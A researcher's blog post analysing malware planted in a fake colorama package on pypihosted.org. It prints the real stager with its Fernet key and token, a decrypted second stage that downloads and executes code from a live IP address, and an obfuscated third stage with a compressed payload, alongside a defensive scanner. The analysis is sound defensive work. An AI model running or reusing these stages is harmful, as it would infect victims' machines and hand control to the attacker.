Let’s dig deep into pypihosted malware | Part 1

Mohammed Dief
7 min read · Mar 4, 2024


I hope this article finds you well. In the last article I talked about how I discovered malware on my system: a PyPI package had been modified, edited and hosted on pypihosted.org, and was getting placed in the requirements.txt of random projects on GitHub, spreading malware all over the internet.

This time I was actually able to download the malware. Checking the commits made by the attacker spreading it, I found that he had added a new version of the colorama library, 0.4.6, and a new tar file was created, which I was able to download.

The commit made by the hacker

I downloaded the tar file and unpacked it. The malware was in the same place as before, in __init__.py, pushed far to the right by a long run of whitespace so people wouldn't notice it. But this time it turned out that the attacker actually owns pypihosted.org, and the malware had moved from the Galaxy Gates VPS servers onto that domain.

The malware being hidden in __init__.py file

I opened the link and found the Python code he executes on his victims' systems.

Python code he’s using for exploitation

Here's the code in case you want to debug it yourself:

__import__('os').system('pip install -q fernet requests pycryptodome psutil && cls');exec(__import__('fernet').Fernet(b'tEeTr78OlX-bMK3PJkOt0KNfrobTKZp-NnmgUQMFb5A=').decrypt(b'gAAAAABl44lrawN9NjeZSRVFRIDKe6XPssyd29pCJNboJHzjHK51ZijwDWNYw88JUAMupe1TSAIPzcUTfLB8uxzDjf3n5maiFcNm4yM5ZIhVGjy9csiNLVMVhfX4xY8IP4vSlM3EuxsNYYC-oGpnnl379012zETOcxzVfk8bMRiKc9gZgxNrAB_PItvoDoNGx7bcPsx9QgTTkVT8cjYiTMr04feyMu79pDBPsdJGWzzk7za-dQxhFDkDVrqTtaCvW81sITlDSksBB2aKRAVdhs9-9ZDvAE3nK69l92jGLCf-Y5MDJwyTcVBTEu9oOVcuLRPqD4AjuKeT4QGjUjWJfq5C96xzLCiltyYCjDXWJCmgamt70M_oHIcC7hyb1J7tGqtOPz1eTQpN4SFCt70-lsyrw04YAwuTjFU9ed1VyQjnCsVPYoV6Ku1MeytccZHPoTF1EkV5BnoNdmS1mCKog4iQrtQdL-ayTtEOmtN-A4Y8WDxrLvATBQ3UMTSsLhH4uAID1s5NI1WS57jmW1Xi-3CrSV6fiEAAOguLkoo2LqpNI2sCaW52DPpmUrolYuRuI__beV67uv3d_BrH5J5qnra0VPoe56qCheYqfsXbLWFn0VRkO8j4-qWL2IBdp2SeNuT15-OcwOD9H3RfheXvAKdrrxG1CQZpPvT5CUIkRfx39fK1wOBkXrO1K5UOgT4nTVzZ8R24M-KwsKsgKTrLWk_rUTtJGX5DFC4Nu-qCxOCvOLf_y5wzokgfOscLrc2lXKCxrEhrrLaEBR6SZKcieZ9oipPD3OkpKibrshcOi8_uFpnnu3TnB8WKyKkttfCozngXdsKH7oznNaxIYmAZIBP_wBCGPC1sEX6fWVk6RfZi5LL9zyLew58i4lcf01D26k7dHDrlYa8r3oTlxApnfMDGXSOzPppb0bhM5DBMbewp2CXe-HVaXAZ9ZFW5LJeMwKI90aGB57X0Bfzr4PfOSvXODI4pk8e5NGucI55N-z0znbp2g_Ostcw='))

So, let's break down the stager. It uses __import__ to load the os module and calls os.system to run a shell command:

pip install -q fernet requests pycryptodome psutil

It uses pip to install fernet, requests, pycryptodome and psutil. The -q flag silences pip so nothing is printed that would make the user suspicious of colorama, and because the two commands are chained with &&, cls (the Windows console clear) runs right after a successful install to wipe anything that did appear. cls only exists on Windows, which already hints at the intended target; on other systems the packages are still installed and only the clear fails.
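Before decrypting anything, it is worth having a static check that catches this kind of stager in a package file without running it. The scanner below is an added example written for this article (not the attacker's code and not part of colorama); it looks for the traits seen above: a line hidden behind a huge run of leading whitespace, __import__('os').system(...) invoking pip, exec() fed from a decrypt/decode call, and a Fernet key and token literal. The sample __init__.py it scans is constructed here, and the key and token in it are placeholders of the right shape, not the real ones.

```python
"""Static triage of a Python module for the pip-then-Fernet-exec stager pattern.

Added example for this article. Nothing here executes the scanned file; it
only reports where the suspicious constructs are so an analyst can pull the
key and token out and decrypt them in a sandbox.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

HIDDEN_INDENT = 120   # legitimate modules rarely indent 120+ columns
LONG_TOKEN = 100      # opaque url-safe base64 blobs longer than this are worth a look

RULES = {
    "os.system via __import__": re.compile(
        r"__import__\(\s*['\"]os['\"]\s*\)\s*\.\s*system\s*\("),
    "pip install inside a string": re.compile(r"pip\s+install\b"),
    "exec() of decrypted/decoded data": re.compile(
        r"\bexec\s*\(.*\b(decrypt|b64decode|decompress)\s*\("),
    # 32 random bytes, url-safe base64 -> 43 chars plus one '=' of padding
    "Fernet key literal": re.compile(r"Fernet\(\s*b?['\"]([A-Za-z0-9_\-]{43}=)['\"]"),
    # Fernet tokens start with version byte 0x80, which encodes as 'gAAAA'
    "long opaque token": re.compile(
        r"['\"](gAAAA[A-Za-z0-9_\-]{%d,}=*)['\"]" % LONG_TOKEN),
}


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    evidence: str


def scan_source(text: str) -> List[Finding]:
    """Return one Finding per (line, rule) hit; an empty list means nothing matched."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent >= HIDDEN_INDENT:
            findings.append(Finding(line_no, "code hidden by leading whitespace",
                                    f"{indent} leading spaces"))
        for rule, rx in RULES.items():
            m = rx.search(line)
            if m:
                evidence = m.group(1) if m.groups() else m.group(0)
                findings.append(Finding(line_no, rule, evidence[:60]))
    return findings


def extract_fernet_stager(text: str) -> Optional[Tuple[str, str]]:
    """Pull (key, token) out of a Fernet(...).decrypt(...) one-liner without running it.

    Decryption is left to the analyst, e.g. cryptography.fernet.Fernet(key).decrypt(token),
    so the plaintext is never exec()'d by accident.
    """
    key = RULES["Fernet key literal"].search(text)
    tok = RULES["long opaque token"].search(text)
    if key and tok:
        return key.group(1), tok.group(1)
    return None


# Constructed sample: two harmless lines, then a stager pushed 400 columns right.
FAKE_KEY = "A" * 43 + "="                 # placeholder, not a real key
FAKE_TOKEN = "gAAAA" + "B" * 120 + "="    # placeholder, Fernet-shaped but meaningless
SAMPLE_INIT = (
    "from .ansi import Fore, Back, Style\n"
    "__version__ = '0.4.6'\n"
    + " " * 400
    + "__import__('os').system('pip install -q fernet requests && cls');"
    + f"exec(__import__('fernet').Fernet(b'{FAKE_KEY}').decrypt(b'{FAKE_TOKEN}'))\n"
)

if __name__ == "__main__":
    for f in scan_source(SAMPLE_INIT):
        print(f"line {f.line_no}: {f.rule} [{f.evidence}]")
    print("stager key/token:", extract_fernet_stager(SAMPLE_INIT))
```

Run it over every `__init__.py` of a freshly downloaded sdist before `pip install`; a single line that trips the whitespace rule together with the os.system and exec rules is exactly the shape of the colorama copy described above. The indent and token-length thresholds are my own choices and can be tuned.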

Then it decrypts a Fernet token and hands the plaintext straight to exec, so the real code never appears in the file. To decrypt the token myself I used the cryptography library, because for some reason the fernet package wasn't working on my machine. This is the code I ended up using:

from cryptography.fernet import Fernet

decoded_code = Fernet(b'tEeTr78OlX-bMK3PJkOt0KNfrobTKZp-NnmgUQMFb5A=').decrypt(b'gAAAAABl44lrawN9NjeZSRVFRIDKe6XPssyd29pCJNboJHzjHK51ZijwDWNYw88JUAMupe1TSAIPzcUTfLB8uxzDjf3n5maiFcNm4yM5ZIhVGjy9csiNLVMVhfX4xY8IP4vSlM3EuxsNYYC-oGpnnl379012zETOcxzVfk8bMRiKc9gZgxNrAB_PItvoDoNGx7bcPsx9QgTTkVT8cjYiTMr04feyMu79pDBPsdJGWzzk7za-dQxhFDkDVrqTtaCvW81sITlDSksBB2aKRAVdhs9-9ZDvAE3nK69l92jGLCf-Y5MDJwyTcVBTEu9oOVcuLRPqD4AjuKeT4QGjUjWJfq5C96xzLCiltyYCjDXWJCmgamt70M_oHIcC7hyb1J7tGqtOPz1eTQpN4SFCt70-lsyrw04YAwuTjFU9ed1VyQjnCsVPYoV6Ku1MeytccZHPoTF1EkV5BnoNdmS1mCKog4iQrtQdL-ayTtEOmtN-A4Y8WDxrLvATBQ3UMTSsLhH4uAID1s5NI1WS57jmW1Xi-3CrSV6fiEAAOguLkoo2LqpNI2sCaW52DPpmUrolYuRuI__beV67uv3d_BrH5J5qnra0VPoe56qCheYqfsXbLWFn0VRkO8j4-qWL2IBdp2SeNuT15-OcwOD9H3RfheXvAKdrrxG1CQZpPvT5CUIkRfx39fK1wOBkXrO1K5UOgT4nTVzZ8R24M-KwsKsgKTrLWk_rUTtJGX5DFC4Nu-qCxOCvOLf_y5wzokgfOscLrc2lXKCxrEhrrLaEBR6SZKcieZ9oipPD3OkpKibrshcOi8_uFpnnu3TnB8WKyKkttfCozngXdsKH7oznNaxIYmAZIBP_wBCGPC1sEX6fWVk6RfZi5LL9zyLew58i4lcf01D26k7dHDrlYa8r3oTlxApnfMDGXSOzPppb0bhM5DBMbewp2CXe-HVaXAZ9ZFW5LJeMwKI90aGB57X0Bfzr4PfOSvXODI4pk8e5NGucI55N-z0znbp2g_Ostcw=')

print(decoded_code.decode('UTF-8'))

That gave me the actual second-stage code, which looks like this:

import subprocess
from tempfile import NamedTemporaryFile as tempnaw
from os import system as syast

# Probe for a Python launcher; the console-less ones (pythonw, pyw) come first.
py_execs = ["pythonw", "pyw", "py"]
for py_exec in py_execs:
    try:
        subprocess.run([py_exec, "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        break
    except FileNotFoundError:
        continue
else:
    py_exec = "python"

# Drop a one-line loader that fetches and exec()s the next stage in memory.
temp_file = tempnaw(delete=False)
temp_file.write(b"""exec(__import__('requests').get('http://162.248.100.217/inj', headers={'User-Agent': 'Mozilla/5.0 (CyberW / Python) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'}).text)""")
temp_file.close()

# Launch it detached through cmd's `start`.
try:
    syast(f"start {py_exec} {temp_file.name}")
except:
    pass

As we can see, the script has a list of common Python launcher names and probes which one exists on the victim's machine. subprocess.run raises FileNotFoundError when the executable is not on PATH, so the first name that can be started at all is kept (the exit code is never checked); if none of them works, the for/else falls back to plain python. The order matters: pythonw and pyw are the console-less Windows launchers, so whatever runs next gets no visible window.

After that it does the same trick as the first stage: it writes a one-line loader to a temporary file (created with delete=False, so the file stays behind) that uses requests to fetch http://162.248.100.217/inj with a spoofed browser User-Agent and exec()s the response, then launches that file with the chosen interpreter through the Windows start command. Nothing from /inj is written to disk by this stage; the next stage is pulled down and executed in memory every time the temp file runs.

Now let's take a look at the new stage that comes back from /inj:

#Lets Try
from builtins import *
from math import prod as _假设
_代码_ = '尝试尝试 = "尝试尝试"'
_统计学, 统计学, _计算, 数学, _堆栈溢出, 计算 = exec, str, tuple, map, ord, globals
class _乘积:
def __init__(self, _分割):
self._内存访问 = _假设((_分割, 78309))
self._内置函数(_运行=87522)
def _内置函数(self, _运行 = Ellipsis):
self._内存访问 *= 43545 * _运行
def 系统(self, _数学 = -24271):
_数学 /= 38361 / -84088
self.运行 != float
def _帧(_理论 = bool):
return 计算()[_理论]
def _检测变量(算法 = -80858 - -48824, 帧 = bool, 分割 = 计算):
分割()[算法] = 帧
def execute(代码 = str):
return _统计学(统计学(_计算(数学(_堆栈溢出, 代码))))
@property
def 运行(self):
self.调用函数 = '<_主要的_._内置函数 物体 で 0x00000451242BE559812>'
return (self.调用函数, _乘积.运行)
if __name__ == '__main__':
try:
_乘积.execute(代码 = _代码_)
_调用函数 = _乘积(_分割 = 47761 + -76211)
if 535745 > 6635814:
_调用函数.系统(_数学 = 52743 * _调用函数._内存访问)
elif 423698 < 6928056:
_调用函数.系统(_数学 = 30109 + _调用函数._内存访问) ;_乘积._检测变量(算法='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら',帧=b'x\x9c\xed\\\xcdO\xe3H\x16\xbf\xe7\xaf\xf0\xfab[\x1d\xdc\x81i\xcd\xb2H90\x10z\xd1t\x03\x1b\xc2\xb0\xbb\x04E\x8e]I\xaaq\\\x9er\x19H#\x0e\xcci\x86\xc3\xcc\t\xf5\x9f\x80\xc4e\x94\xc3^\xfb\x9f\xe1\x1f\xd9W\xfe(\x97?\xd2\xbbZ\xad\x940m\xdaJ\xca\xaf\xde{\xf5\xbe\xea\xf7*_\xed\x12\xdbr\x03\xdd8\xd3\x9e\xef\xee\x9f\xef\x9e\xd2Gq\xddK\xf4\xfb\x05\xb7e\xa2,^\xd6\xf3\xb4\x80\xbf\xb8\xb4v\xde\x1e\xbbd\x08\x066V\xd0\xba(h?\xfd\xf2|7\xe7\x8f\xf1 \x1e\xdf=D\xd7\x9c?&\xb7\xf3\xdc@\xbeb\xa9\x9c\x12I*Q%\x14\xa6z\n\xe2\xd9\xad\xc4\\P\x9e\x8c\x1fJ\x06\x14\x94\xf3\x81v\xb6\xb5\xf5j\xed\xd5\x9a\xbe\xa6\xbfZ7\x8c\xf3\xf3\xb6\x83\xe9\xca&\xa1\x9a\xe3>\xaf\xf4\xa9\xca\xc42\xb1\xd2\xc3\x82\xb7O\xe5\xf0\x8c\x11\xb3\x18[\xdd\x10\x89\xca\xca\xe5\xf9!+\xa2B)U\xb2\x89\xd2\x93K&7x\xc8(r\xf5\xc9\x0b\xc9\x9c\xe5}#o\x82d-i\\(\xdbt\x008\xe1F8\xd6\xf8c\xfb)2\xf9\xb9x\tb<\xc8\x84?\xe7\x06\x82G\x10\x0b\x0c\x95z\xe4\xdb\xbb\xcf\x10\xec\xc1\x00O}B\xd9`\xb0\xb2\xf5~\xf7{t\xfd+\xbd\xc4\xed\xaf\xd1\x15\x0fd\x86_%6\x99A\xd0\xe5\xd9\x82*\xc1,\xcb\x16\xd8~\x97\xf4\xc8&\x15t&c\x08\xf2\xd2\x13\xadk\xc3\x10\xbb\x0c{\x81f\x98\x97\x16\xfd*vWE!\x17\xea\xae\xdc\x0e\x16Uhe\xa9&c\x9e\xe0\xff\xa2\xd1Tm\x97\xa7\x12}\x911\xc5\x9d\xa4\xaf@M\x05\x1ef.\x0e\x87\xc5\x16j4+N*\xd5\x87\x95y\xb10\xe4\xfc~\xf9lT,\x9e\x05\x07\xb5\x82\xf2\x9c\x01\xf3\\Ee&=\xe4\xf4K;b\xa5\xa3n\x9c\xd5a_F\xd8M\xec9\xe8Z\xd7P\xe0Z{\xa5\xe9s\xa3\xf1\xd2;X\x8c\xa6??\xdf}z\xbe{\x8c\x1f[\xad\xe8\xf9S\xf6\xf4(\xaeV\xca\xf5)\xe1\xcdF-!\xf2(T\t\t~\xdf\xaa\xc1\xb4\x06\xd3U\x88z\r\xa6\xcb\x05Sf\x11wT\r\xa6\xf7U\x00Q>\xa6U\xc2D\xe5Q\xae\x08\x07\xff\xdb\xab\x94\x9f[\x1c\xde\x1e[2\xaa\xa5\xa0\xf7X\x80\xc4d\xb6\xd5\x92\x11\xf21\x15\x17*>\x01\x1aj\x9a\xf9\x81`\xef\xab8\xb0\xcf\xd38\xff&]\xf3<}\x9e\xa7\x8b\xdb\xfbt<_ 
u\x9f\xe7\x9c\xe7W\xb9\x97\xd4\x16\xe8sI\xa4p\xfb[\xdd\xae\xeav\xb5\nQ\xaf\xdb\xd5r\xc2\x9e\xb6+\xd7\xbaD/\xaa[}\x01\xa4\x9e\x16,\xf6\x058\xab\xb4\xb5\x12\xd1\x16\xf9\xc3\xaf\x1aLk0]\x85\xa8\xd7`\xba\\0E!\xed\xfdq\xdfGI\x81\x89\x87\xe3)\x8d\xd1S\xeeQ\x1e\xc8\x97,R\xe0\xafd\x88nkT\xadQu\x15\xa2^\xa3\xear\xc2.\x8e\xa8\x84\x94gW\xf8\x88ZLK\x95\xe7_\x88Q9\xb8r\x94e\x91B\xb6\n\xe3ER?\xfd\xf2\xd5\x02+\xc6v`y\xb8\x06\xd6\xd5\x88z\r\xac\xcb\t{\n\xac\xb3\x11v\xaf\xd1\xc4\x0b_\x12\xba\x16R.\xdffi\xce\xe7#\xcbY\xe9\xab\x90i\xc2r\x82\xd9@\xae6iE\xb9\x02\xca\xa5S\x90\xad\x16\x9c\x97l\xe3\xc4\xaf\x16\x99\xeb#\xefJE\xbdF\xe6\xe5\x84]\xbc\x91\xe0b\x7fJ\xec\x17\x85\xcb\x02\xef\n\x1fM\xddGD\xa1B\xf0\x08z\x81s.\xd1\x0b\x1fk\xcdK\x1f\xa1\xddW\xad5/}\x9c6\xaf\xe1\xb5\x86\xd7\xd5\x89z\r\xaf\xcb\x85W\xca\x82\x97\x04\xadY:\x1f*\x06\xe5Z)\xdf\x96kbQ\x05T\xe4\xf5\xa1bPYC\xf2\x94\x18ge\x97/\xf7\x82\x9dw\x0frF\xa4\x96\xf1b\xbeQ\xa1\x97v\xcf\xca\xbd\xf1\xa3\x0f\xb5o\xd67\x9c\x8d\xcd\r\xe7\x9b\xd6\xc6_4\xc3t\x90M\x1c\xa4k\x9b#V~\x15hD\xbf*\xaa;f\xdd1\x97\x1e\xf5\xbac.\'\xeci\xc7\xb4\xd1u\xe5\xd7D\xe0oD\xc9TI\x7f\xa5\xa3\xc4?\xcaR\x1cL\x9b b7\xa9\xe5\x8dQ\x93\xf8\xc8\x83{\xcc\x1a\x9c\xa8k\x1aH&\x9cA8\xf4)\xb1Q\x10\xa4\x14L\xc4\xdcL\x10\x87V\x80\xbe}\x93\xdeQ\xf4c\x88\x02\x16\xc4\x8b\x13\xb1\xec\x181\xe4]6\x15\xcf\x9a\xa2\xa6\xe2\xe2\x80qC8\xd9%c\xec526\xdf\xca\x16\xbc\xc2\x1eE\xe3X\x17\xd8\xeb\xc0S2cO\x08\xb6Q\xba\x8a\xe9[l\x92N\xe1`\x84]X\x84\x7f\xc7\xb1\xc9\xfd\xe5k6\x1a\x0e\x1aq\xf5\x03\xec_\xbe\x19X\x8eC\xc11\xdd\xd8j(\xf0\xc7\xe8,\x1e\xf0?\x8aXH=\xe1\x89\tB\xba:a\xcc\xdfz\xfd\xda\x9e 
\xfb\x02\xfb\xa65\xb5>\x12\xcf\xba\nL\x9bLU\xc3d\xe8\x9a\x99\x01\xa3\xd8\xd7\x8dH\x11\xba\xb6\x91\xcf\x94N\xf4\x84\x89\xa7X\x81\x82Jkh\x07\xc4C\x1aD\xdc\xe7V)\xed\n\x03ar\x14EM\xf9S[Q=\xa6n%\xfa1\xe3\x93\xfel\xc0\x13\x17\x80\xec\x99\xea\xcf\xd8\x84xWjS\x81a\xf2\xa4\x9e7F\x84*\t\x9f\x82\xbdt\x18T\xb8\x9e\xa5\xdc\xa4\xa1\xa7\x9f%\xac\xa0hm\xed\x12\xd1\x00\x1cQ\xcf\x9b\n$\x8f\x84\xac-q\x1f\xed\x1fu":\xa2\xb4H7\x84\xfa!E\xd6\x85\x1c\x9e=H\xd4\x01a{$\xf4\x9c\x0e\xa5\x84f\xa6\xd8\xc4\x83\xb2\rQ\x03\xb9A\x12\xb8\xd4\x87\xb6\x92x\xaar\xff#\x97\x07Q\x01\xb4\xa3\x9c\xebI\xcau(R\x93\x0b\x84\xcc\x1a\xba\xc8h*#\xed&\xd1q\xcb\'x\xads\xc6(x\xd1\n\xea[j\xf9\x13l\x07\xbb\x14\x83\xbfj3\xa6\x1e\x83\x0e\x8a\xd9l\x07y,\xa3\xf6\xac\xe0\xe2\x18\n\xc2\t\xdd\x8c\xf8\x1e9\xd8z\x87\x87\xd4\xa2\xb3\x94v\x12 zD\t\xaf\xca \xa5\x1d vE\xe8\x05\xf6\xc6=B\\A>"W\x88\xbe\xb7<k\x8c\xa6\xb0XJ\xe6q\xea\\\xfb.\xa1\xd9J\xbb(\xb8`\xc4?\xc5\x0e\x14M\x90Q/a_\xc4\x1a\x04k\x17\x8da\xc3\xd1Y\xc7\xc1\x8c\x08\xeaw\x96}\x11\xfa\'\x0c\xbb\xe0\x9a0\x80b\x8f\xfd-D!\x12\xce\xcf\x02\x86\xa6\'\xbecI\xbe\x7f\xe7\x86\x88\x11\xc2&\xc7\x0c\xb4\x08\xe7-\xdf\xcfx\xde\x11\xcb\xc9\xee\xde\xf2@#\xca\xad\x13\xc6\xbe\xc76%\x01\x19\xf1\xad\xe3@\x95N-\xe1\xb1\xe5\x90\xa10a7\xaf\x18l\x0c\xa6\xc2<\x9f\xd8yS\xcd\xde\x04\xea\xcc\x81\xd0\x9a=<\xcd\xc4N\xf6\xcd#7\x04\xb01\x0fl\xbf \xd2\r\xa1\xda\xa6\xc8<F\x14[.\xfeh\xf1=k\xfe}\xea\x16\xf8 mfZ\r\x15S\xdd\x043*\xa6\xc0\xe8)fPU\xc5\xc9\xfdC \x9c\xc7\xf8\xf4\x16\xb1n\x04s\xbb\x98\xd2\x14\x9cb\xe0s\t/\xfc\x18\xf6\xf4\xb3\x18Nuu\xfb\xe8hw\xbb\xb7\xad\x1aM%%\xbd;\xdc\xd9~\'\xe8\xe7\xf1\xee\x83-9".\xa4\x83\xd7z\x82\xbe\xbaP\x1c\xf3p\x98\x18p\x80\x88:\x83\xbe\xde2r\xc0\x10/\x9d\xd9\x90\xa9\xcc6x\xfc\xff1(#\xecY./w1!( 
\x9f\xf9\xf3JQ\xfb}\x15\x9e\x84z!\xc0A\x8f\xa4X\xae\x0bqC\x01aE\x85\x7f\xd1\xac\x97If\xb6J\xf8\x9a7$!\xa6\x81\xeau\xde\x1f\xa9F\x1c\xf8\x1d\xa8\x18\x86"8\x82:\x85\x05#\xcf\xa4\x04D\x08,|\x8fP\xc3(N\x8a\xd5\xcc\xc0\x87=\xa5s\xe7\x8c\xb3\xb5\xf5s\xee\xa8\xc9\xfdL\x99\xffc\xbc\x0b\xee\xab7\xb1A\xb7\xfd\xfeM\xaa\xe3V5\xaa}V%\x96FU0\x16\x9a\xa7\xaa\xd1\x0f\x03\xf4\xc4KuhCl\xc6\x13\xfc\xe1\xc2\x9dz\xc4\xff\x91\x06,\xbc\xbc\xba\x9e}T\x8d\xa2\xf5\x9bF\x12\xc9S\xd8\x1aQ y\xd6 a\xb1\x8dW\x18\xe0\x99\x9f5\xf4\xb87O\xe1\xb5M[\xe5-\ny\xf0:\x07\xf6j[\r\xd9hm\x134C\xa7\x1ce\x9e\x8d\xcc+\xaeQ\xafl\xc7\xeb\xdfn\x98\x1bo6\xcd\xf5V\xcb\xdcX\xff\xf3\xd6f\xeb\xf5\x98\x0e\x93~\x9c\x18\x04\x08EYl\x10o\x12\x89Ar\x8f\x8a\xec:+6\x87\xa6\xc2\xd9\xa1\xdb\xd9\xbc6\x00\x0eF\xae5\x0e\xe4\xe6\xb6\xd3\xedl\xf7:\x83\x83\xc3\xc1\xe9\xfe\xc1\xee\xe1i\xba b\xd1\x9a\xb9\xe5|BF\xc8I\xba\xd4HSo\xe4\xc6u\x0b\x05}\x13\x0f\xb4$\\\x1e?\xf8\x00k|\x022\xff\xfa}\xe7\x1f\x83\x9d\x93n\xb7s\xd0\x1b\x9c\x1cw\xba\xb1V\xbe\x0c\x0b}\xde\x11\x8f\x0f\xf7z\xa7\xdb\xddN\xbf/P\xb5\xdf?\x85C"\xb9\n\xfa\xfd\x9d\x90R\xe8\'?\xc4=\xbc\xdf\x07\xbc\x8bk\xe3\x02\xcd\xecl\x99x\x1b|\x8ff\x9dk=\xb1\xa1)Vi*\xadf\xca\xc8\xcd9\xed\xee\xf7\x92\xe6\x9eP\xc1\xf3\x1f,\xe8\x0c \xcd\xf56\xf3\xdbE\x96\xefv\xde\x0e\x8e\xff\xd9\xe4\xc5*\x85\xe6\x96o\xc7\xc6^T\xea\x87\xa3\xbd\x18.\n\x98\xd8\xe0\x1bTL\x16\xf7\xad,k4\xf6B\xd7M\x18sJ\x05\xeed\xba\x1aR\xdd\xa6bFC\xaa\x9d\x8c(NL"\xd1\xd9\\|\xaeI\x8e+\xfc \xdb\x08\xa1\xe9%\xf8\x90\x1evuC\x81\xcd\x93\x1cuy=s\x1e~\x98\xa3\x1c\x1d\xd3:\xf7I\xc0tmq\xa1G\xaa>@\x99~\x08\x88\xd7\xbeQ\xd3\x85\xd4-%\x1d\xc2\xb9\x8d\x0f\xb1\x0f\xb4\xf8\x88\x99P\x02\xa8i\xe4\x05\x13\x02\xc7I%\xbbq\xb1wq\xdbT&\x887\xee\xa0}\xa3\xed\xc0!\x0c\xcaf\x8d\xcd|\xa4m)\x1a\xb4a\x17\xdb\xd1nx\xcd\x97\xd5n\x97\x9f\xb0\x1d\x17\xfb\xff\xd7\x9c\xfd\x1b\xd6a\xee\x1f')
_乘积(_分割 = -8638 * -84594)._内置函数(_运行 = _调用函数._内存访问 - -61335) ;ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ,えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000,あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび,ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら,まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま=(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c'))),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ(__import__('\x7a\x6c\x69\x62'))),(lambda え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0,ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)),(lambda:(lambda 
ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
_调用函数._内置函数(_运行 = _调用函数._内存访问 / 65491) ;まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま()(ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら(ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ(あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび(えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000('\x76\x61\x72\x73'))),_乘积._帧(_理论='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら')))
except Exception as 假设:
if 496203 > 7675892:
_乘积.execute(代码 = 统计学(假设))
elif 387379 > 5850648:
_乘积(_分割 = -82712 * 93033)._内置函数(_运行 = _调用函数._内存访问 * 80573)

